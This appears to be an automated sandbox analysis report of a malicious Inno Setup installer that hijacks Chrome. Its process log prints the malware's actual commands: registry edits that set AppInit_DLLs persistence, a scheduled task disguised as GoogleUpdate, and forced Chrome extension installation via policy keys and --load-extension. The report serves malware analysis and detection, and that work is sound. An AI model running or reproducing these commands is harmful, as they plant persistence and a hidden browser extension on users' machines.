Source: inno-chrome-malware.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Detected potential crypto function
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Code function: 8_2_00007FF68FF11400 8_2_00007FF68FF11400
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Code function: String function: 00007FF68FF12980 appears 90 times
PE file contains executable resources (Code or Archives)
Source: inno-chrome-malware.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: inno-chrome-malware.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Sample file is different than original file name gathered from version info
Source: inno-chrome-malware.exe, 00000000.00000003.307803208.0000000002600000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs inno-chrome-malware.exe
Source: inno-chrome-malware.exe, 00000000.00000000.307241846.00000000004C6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs inno-chrome-malware.exe
Source: inno-chrome-malware.exe, 00000000.00000003.316040944.00000000023C8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs inno-chrome-malware.exe
Source: inno-chrome-malware.exe, 00000000.00000003.308304038.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs inno-chrome-malware.exe
Source: inno-chrome-malware.exe, 00000002.00000003.334306976.0000000002208000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs inno-chrome-malware.exe
Source: inno-chrome-malware.exe Binary or memory string: OriginalFileName vs inno-chrome-malware.exe
Tries to load missing DLLs
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Section loaded: sxsext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Section loaded: sxsext.dll Jump to behavior
Source: C:\Windows\System32\taskkill.exe Section loaded: sxsext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: sxsext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: sxsext.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sxsext.dll
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Section loaded: sxsext.dll
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Section loaded: sxsext.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sxsext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: sxsext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: sxsext.dll
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsext.dll" /f
PE / OLE file has an invalid certificate
Source: inno-chrome-malware.exe Static PE information: invalid certificate
Source: inno-chrome-malware.exe ReversingLabs: Detection: 12%
Source: inno-chrome-malware.exe Virustotal: Detection: 42%
Source: C:\Users\user\Desktop\inno-chrome-malware.exe File read: C:\Users\user\Desktop\inno-chrome-malware.exe Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\inno-chrome-malware.exe C:\Users\user\Desktop\inno-chrome-malware.exe
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process created: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp "C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp" /SL5="$4003C,847369,780800,C:\Users\user\Desktop\inno-chrome-malware.exe"
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process created: C:\Users\user\Desktop\inno-chrome-malware.exe "C:\Users\user\Desktop\inno-chrome-malware.exe" /SILENT
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process created: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp "C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp" /SL5="$B02CA,847369,780800,C:\Users\user\Desktop\inno-chrome-malware.exe" /SILENT
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\ServiceApp\install.bat" install
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsext.dll" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe "C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe" install
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\ServiceApp\reg.bat" install
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn GoogleUpdate
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn GoogleUpdate
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://getfiles.wiki/welcome.php
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1804,i,472912255664809026,8251268862779871996,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 5
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1768,i,12946548983093314367,2860086679662111861,131072 /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1720 --field-trial-handle=1788,i,69093187832694588,15968466720794163627,131072 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe
Source: unknown Process created: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1844,i,10208979890822883720,14269069191704326232,131072 /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 1
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process created: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp "C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp" /SL5="$4003C,847369,780800,C:\Users\user\Desktop\inno-chrome-malware.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MQCLC.tmp\inno-chrome-malware.tmp Process created: C:\Users\user\Desktop\inno-chrome-malware.exe "C:\Users\user\Desktop\inno-chrome-malware.exe" /SILENT Jump to behavior
Source: C:\Users\user\Desktop\inno-chrome-malware.exe Process created: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp "C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp" /SL5="$B02CA,847369,780800,C:\Users\user\Desktop\inno-chrome-malware.exe" /SILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\ServiceApp\install.bat" install Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe "C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe" install Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\ServiceApp\reg.bat" install Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PH709.tmp\inno-chrome-malware.tmp Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://getfiles.wiki/welcome.php Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsext.dll" /f Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn GoogleUpdate Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn GoogleUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" " Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1804,i,472912255664809026,8251268862779871996,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1768,i,12946548983093314367,2860086679662111861,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1720 --field-trial-handle=1788,i,69093187832694588,15968466720794163627,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
